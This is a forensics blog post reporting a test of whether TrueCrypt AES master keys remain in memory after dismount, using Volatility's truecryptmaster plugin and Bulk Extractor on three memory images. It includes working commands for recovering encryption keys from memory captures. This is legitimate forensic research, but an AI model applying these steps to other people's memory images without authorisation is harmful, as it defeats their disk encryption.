A few weeks ago I was presenting at a local forensics meeting and was asked by an attendee whether AES keys from Truecrypt remain in memory after the Truecrypt volume is dismounted. I replied that I was fairly certain they were flushed from memory when the volume was dismounted, but that I hadn't tested it. It's a simple thing to test, so I made a mental note to try it when I had the chance.

I fired up a laptop running Truecrypt 7.2 on Windows 7 and acquired its memory using the new Magnet Forensics memory acquisition tool. I then mounted a Truecrypt volume and took a second memory image. Finally, I dismounted the Truecrypt volume and immediately acquired the memory a third time.

Obviously the first memory image didn’t have any Truecrypt AES keys since I hadn’t mounted the volume yet.

In the second memory image I used the Volatility “truecryptmaster” command to locate and display the Truecrypt AES key.
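The same check can be scripted across all three captures. This is a sketch assuming Volatility 2.x, a Win7SP1x64 profile, and image file names of my own choosing (before.raw, mounted.raw, after.raw); if Volatility isn't on the PATH, it just prints the commands it would run:

```shell
#!/bin/sh
# Assumed file names and profile -- adjust for your own captures.
PROFILE=Win7SP1x64

check_image() {
  # Run the truecryptmaster plugin if Volatility is installed;
  # otherwise do a dry run and print the command instead.
  cmd="volatility -f $1 --profile=$PROFILE truecryptmaster"
  if command -v volatility >/dev/null 2>&1; then
    $cmd
  else
    echo "$cmd"
  fi
}

for img in before.raw mounted.raw after.raw; do
  check_image "$img"
done
```

If the keys really are flushed on dismount, only the second image should produce a master key.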


Finally, for the big test, I examined the third memory image, which I acquired right after dismounting the Truecrypt volume.


It appears that the Truecrypt AES keys are indeed flushed from memory as soon as the volume is dismounted. I wanted to verify my findings using a different tool, so I fired up Bulk Extractor and ran it against all three memory images. As you can see in the screenshot below, the Truecrypt AES master key shown in the second Volatility examination appears in the second memory image but not in the first or the third.
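The Bulk Extractor cross-check can be scripted the same way. This sketch uses the same assumed image names as before and assumes bulk_extractor's AES scanner (enabled exclusively with -E aes), which writes candidate keys to aes_keys.txt in each output directory; the sketch only prints the commands rather than running them:

```shell
#!/bin/sh
# Assumed image names; be_cmd builds the bulk_extractor command line
# for one memory image, using a per-image output directory.
be_cmd() {
  echo "bulk_extractor -E aes -o be_${1%.raw} $1"
}

for img in before.raw mounted.raw after.raw; do
  be_cmd "$img"        # printed rather than executed in this sketch
done

# Then compare the feature files across captures, e.g.:
#   grep -i '<master key hex from Volatility>' be_*/aes_keys.txt
```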


This was a quick and simple experiment to verify that what we thought was happening was actually happening.